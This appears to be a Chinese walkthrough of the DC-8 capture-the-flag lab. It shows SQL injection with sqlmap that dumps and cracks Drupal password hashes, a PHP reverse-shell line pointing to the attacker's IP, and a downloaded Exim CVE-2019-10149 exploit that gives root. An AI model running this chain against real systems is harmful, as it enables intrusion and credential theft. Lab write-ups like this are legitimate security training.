文章目录
- Information collection
- Penetration
- 1、sqlmap获取用户名密码
- 2、利用web端反弹shell
- 3、利用Suid提权
Information collection
└─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:67:e3:7c, IPv4: 192.168.155.245 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.155.53 1a:ca:aa:46:d5:7f (Unknown: locally administered) 192.168.155.207 08:00:27:45:85:d6 PCS Systemtechnik GmbH 192.168.155.227 30:03:c8:49:52:4d CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 8 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.024 seconds (126.48 hosts/sec). 3 responded ┌──(root㉿anla)-[~]
└─# nmap 192.168.155.207Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT Nmap scan report for 192.168.155.207 Host is up (0.000046s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds ┌──(root㉿anla)-[~]
└─# nmap -T4 -p- -A 192.168.155.207 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 23:12 EDT Nmap scan report for 192.168.155.207 Host is up (0.00031s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA) | 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA) |_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519) 80/tcp open http Apache httpd | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-title: Welcome to DC-8 | DC-8 |_http-generator: Drupal 7 (http://drupal.org) |_http-server-header: ApacheMAC Address: 08:00:27:45:85:D6 (Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.31 ms 192.168.155.207OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds
└─# whatweb http://192.168.155.207/http://192.168.155.207/ [200 OK] Apache, Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Apache], IP[192.168.155.207], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Script[text/javascript], Title[Welcome to DC-8 | DC-8], UncommonHeaders[x-content-type-options,x-generator,link], X-Frame-Options[SAMEORIGIN]└─# dirsearch -u http://192.168.155.207/ | grep "200"200 33KB http://192.168.155.207/CHANGELOG.txt200 769B http://192.168.155.207/COPYRIGHT.txt200 1KB http://192.168.155.207/install.php200 868B http://192.168.155.207/INSTALL.mysql.txt200 1KB http://192.168.155.207/install.php?profile=default200 6KB http://192.168.155.207/INSTALL.txt200 842B http://192.168.155.207/INSTALL.pgsql.txt200 7KB http://192.168.155.207/LICENSE.txt200 2KB http://192.168.155.207/MAINTAINERS.txt200 2KB http://192.168.155.207/node200 2KB http://192.168.155.207/README.txt200 744B http://192.168.155.207/robots.txt200 0B http://192.168.155.207/sites/example.sites.php200 715B http://192.168.155.207/sites/all/modules/README.txt200 431B http://192.168.155.207/sites/README.txt200 545B http://192.168.155.207/sites/all/themes/README.txt200 129B http://192.168.155.207/sites/all/libraries/README.txt200 3KB http://192.168.155.207/UPGRADE.txt200 2KB http://192.168.155.207/user200 2KB http://192.168.155.207/user/200 2KB http://192.168.155.207/user/login/200 177B http://192.168.155.207/views/ajax/autocomplete/user/a200 2KB http://192.168.155.207/web.config200 42B http://192.168.155.207/xmlrpc.phpPenetration
1、sqlmap获取用户名密码
在主页随意点击时发现url有注入点——http://192.168.155.207/?nid=1,尝试sqlmap
└─# sqlmap -u http://192.168.155.207/?nid=1 ……sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:---Parameter: nid (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: nid=1 AND 5794=5794Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: nid=1 AND (SELECT 2533 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2533=2533,1))),0x716a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: nid=1 AND (SELECT 7774 FROM (SELECT(SLEEP(5)))IWeE)Type: UNION queryTitle: Generic UNION query (NULL) - 1 columnPayload: nid=-1943 UNION ALL SELECT CONCAT(0x717a706a71,0x6b5a755051747278644c705a59684f736b464e7a6a44454f776959527776796a6242614e446d7476,0x716a6b6271)-- ----[23:38:13] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL >= 5.0 (MariaDB fork)[23:38:13] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 25 times[23:38:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.155.207'[*] ending @ 23:38:13 /2024-04-26/# 显示可以注入
获取
databasesavailable databases [2]: [*] d7db[*] information_schema
tablesDatabase: d7db [88 tables]+-----------------------------+| block || cache || filter || history || role || system || actions || authmap || batch || block_custom || block_node_type || block_role || blocked_ips || cache_block || cache_bootstrap || cache_field || cache_filter || cache_form || cache_image || cache_menu || cache_page || cache_path || cache_views || cache_views_data || ckeditor_input_format || ckeditor_settings || ctools_css_cache || ctools_object_cache || date_format_locale || date_format_type || date_formats || field_config || field_config_instance || field_data_body || field_data_field_image || field_data_field_tags || field_revision_body || field_revision_field_image || field_revision_field_tags || file_managed || file_usage || filter_format || flood || image_effects || image_styles || menu_custom || menu_links || menu_router || node || node_access || node_revision || node_type || queue || rdf_mapping || registry || registry_file || role_permission || search_dataset || search_index || search_node_links || search_total || semaphore || sequences || sessions || shortcut_set || shortcut_set_users || site_messages_table || taxonomy_index || taxonomy_term_data || taxonomy_term_hierarchy || taxonomy_vocabulary || url_alias || users || users_roles || variable || views_display || views_view || watchdog || webform || webform_component || webform_conditional || webform_conditional_actions || webform_conditional_rules || webform_emails || webform_last_download || webform_roles || webform_submissions || webform_submitted_data |+-----------------------------+
columnsDatabase: d7db Table: users[16 columns]+------------------+------------------+| Column | Type |+------------------+------------------+| data | longblob || language | varchar(12) || name | varchar(60) || status | tinyint(4) || access | int(11) || created | int(11) || init | varchar(254) || login | int(11) || mail | varchar(254) || pass | varchar(128) || picture | int(11) || signature | varchar(255) || signature_format | varchar(255) || theme | varchar(255) || timezone | varchar(32) || uid | int(10) unsigned |+------------------+------------------+
passDatabase: d7db Table: users[3 entries]+-----+---------+------------+-----------------------+---------------------------------------------------------+| uid | name | login | mail | pass |+-----+---------+------------+-----------------------+---------------------------------------------------------+| 0 | <blank> | 0 | <blank> | <blank> || 1 | admin | 1567766626 | dcau-user@outlook.com | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z || 2 | john | 1567497783 | john@blahsdfsfd.org | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |+-----+---------+------------+-----------------------+---------------------------------------------------------+# 最终语句 └─# sqlmap -u http://192.168.155.207/?nid=1 -D d7db -T users -C uid,name,login,mail,pass --dump
爆破数据库中加密的pass
└─# cat DC_8_passwd.txt
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z└─# john DC_8_passwd.txt Created directory: /root/.johnUsing default input encoding: UTF-8Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])Cost 1 (iteration count) is 32768 for all loaded hashesWill run 4 OpenMP threadsProceeding with single, rules:SinglePress 'q' or Ctrl-C to abort, almost any other key for statusAlmost done: Processing the remaining buffered candidate passwords, if any.Proceeding with wordlist:/usr/share/john/password.lstturtle (?) Proceeding with incremental:ASCII1g 0:00:27:13 3/3 0.000612g/s 1235p/s 1236c/s 1236C/s lj0803..lj082aUse the "--show" option to display all of the cracked passwords reliablySession aborted# 跑了挺久,只爆出了一个turtle
在web进行登录(http://192.168.155.207/user/login/),使用用户名john登录成功。
2、利用web端反弹shell
在乱点一通后发现在Find content -> WEBFORMS -> Components(Contact Us) -> Form settings -> Text format处可以修改为PHP code,尝试在Confirmation message写入<?php phpinfo(); ?>,点击下方Save后,提交一次Contact后成功显示phpinfo页面。
继续写入php代码反弹shell
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.155.245/1234 0>&1'");?>└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.207: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.207] 42840
sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)3、利用Suid提权
提权
www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null/usr/bin/chfn/usr/bin/gpasswd/usr/bin/chsh/usr/bin/passwd/usr/bin/sudo/usr/bin/newgrp/usr/sbin/exim4/usr/lib/openssh/ssh-keysign/usr/lib/eject/dmcrypt-get-device/usr/lib/dbus-1.0/dbus-daemon-launch-helper/bin/ping/bin/su/bin/umount/bin/mount
www-data@dc-8:/$ exim4 --versionexim4 --versionExim version 4.89 #2 built 14-Jun-2017 05:03:07Copyright (c) University of Cambridge, 1995 - 2017(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_OpenLookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwdAuthenticators: cram_md5 plaintextRouters: accept dnslookup ipliteral manualroute queryprogram redirectTransports: appendfile/maildir/mailstore autoreply lmtp pipe smtpFixed never_users: 0Configure owner: 0:0Size of off_t: 8Configuration file is /var/lib/exim4/config.autogenerated
使用searchsploit查找可利用漏洞程序
└─# searchsploit exim --id # 显示id不显示路径---------------------------------------------- ---------------------------------Exploit Title | EDB-ID---------------------------------------------- ---------------------------------Dovecot with Exim - 'sender_address' Remote C | 25297Exim - 'GHOST' glibc gethostbyname Buffer Ove | 36421Exim - 'perl_startup' Local Privilege Escalat | 39702Exim - 'sender_address' Remote Code Execution | 25970Exim 3.x - Format String | 20900Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Priv | 40054Exim 4.41 - 'dns_build_reverse' Local Buffer | 756Exim 4.41 - 'dns_build_reverse' Local Read Em | 1009Exim 4.42 - Local Privilege Escalation | 796Exim 4.43 - 'auth_spa_server()' Remote | 812Exim 4.63 - Remote Command Execution | 15725Exim 4.84-3 - Local Privilege Escalation | 39535Exim 4.87 - 4.91 - Local Privilege Escalation | 46996Exim 4.87 / 4.91 - Local Privilege Escalation | 47307Exim 4.87 < 4.91 - (Local / Remote) Command E | 46974Exim 4.89 - 'BDAT' Denial of Service | 43184exim 4.90 - Remote Code Execution | 45671Exim < 4.86.2 - Local Privilege Escalation | 39549Exim < 4.90.1 - 'base64d' Remote Code Executi | 44571Exim Buffer 1.6.2/1.6.51 - Local Overflow | 20333Exim ESMTP 4.80 - glibc gethostbyname Denial | 35951Exim Internet Mailer 3.35/3.36/4.10 - Format | 22066Exim Sender 3.35 - Verification Remote Stack | 24093Exim4 < 4.69 - string_format Function Heap Bu | 16925PHPMailer < 5.2.20 with Exim MTA - Remote Cod | 42221---------------------------------------------- ---------------------------------Shellcodes: No Results┌──(root㉿anla)-[~]
└─# searchsploit -p 46996 # 利用id查看详细信息Exploit: Exim 4.87 - 4.91 - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/46996Path: /usr/share/exploitdb/exploits/linux/local/46996.shCodes: CVE-2019-10149Verified: TrueFile Type: Bourne-Again shell script, ASCII text executable查看46996.sh,提示应将脚本上传至目标机器并告知了两种提权方法,此次使用第二种
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)攻击机开启临时web服务
└─# cp /usr/share/exploitdb/exploits/linux/local/46996.sh ./└─# python -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...目标机获取漏洞利用脚本
www-data@dc-8:/$ wget http://192.168.155.245:8080/46996.shwget http://192.168.155.245:8080/46996.sh--2024-04-27 21:39:39-- http://192.168.155.245:8080/46996.shConnecting to 192.168.155.245:8080... connected.HTTP request sent, awaiting response... 200 OKLength: 3552 (3.5K) [text/x-sh]46996.sh: Permission deniedCannot write to '46996.sh' (Permission denied). # 在当前目录没权限……
www-data@dc-8:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@dc-8:/$ cd tmp
cd tmp
www-data@dc-8:/tmp$ wget http://192.168.155.245:8080/46996.sh
wget http://192.168.155.245:8080/46996.sh
--2024-04-27 21:40:15-- http://192.168.155.245:8080/46996.sh
Connecting to 192.168.155.245:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'46996.sh 100%[===================>] 3.47K --.-KB/s in 0s 2024-04-27 21:40:15 (790 MB/s) - '46996.sh' saved [3552/3552]www-data@dc-8:/tmp$ ls
ls
46996.sh
www-data@dc-8:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh
运行,获取root权限
$ ./46996.sh -m netcat
./46996.sh -m netcatraptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sat, 27 Apr 2024 21:52:39 +1000
250 dc-8 Hello ip6-localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1s0gbf-0000JM-FP
221 dc-8 closing connectionWaiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
id
id
uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim)
cd /root
cd /root
ls
ls
flag.txt
cat flag.txt
cat flag.txtBrilliant - you have succeeded!!!888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.I'm also sending out an especially big thanks to:@4nqr34z
@D4mianWayne
@0xmzfr
@theart42This challenge was largely based on two things:1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42The answer to that question is...希望你喜欢 DC-8。只是想向所有提供反馈的人,以及那些花时间完成这些小小挑战的人表示衷心的感谢。我还要特别感谢以下几位:@4nqr34z@D4mianWayne@0xmzfr@theart42这个挑战主要基于两点:1. 一条我看到的推特,有人问关于在Linux盒子上使用双重身份验证(2FA)是否值得。2. @theart42 的建议对于这个问题的答案是...If you enjoyed this CTF, send me a tweet via @DCAU7.
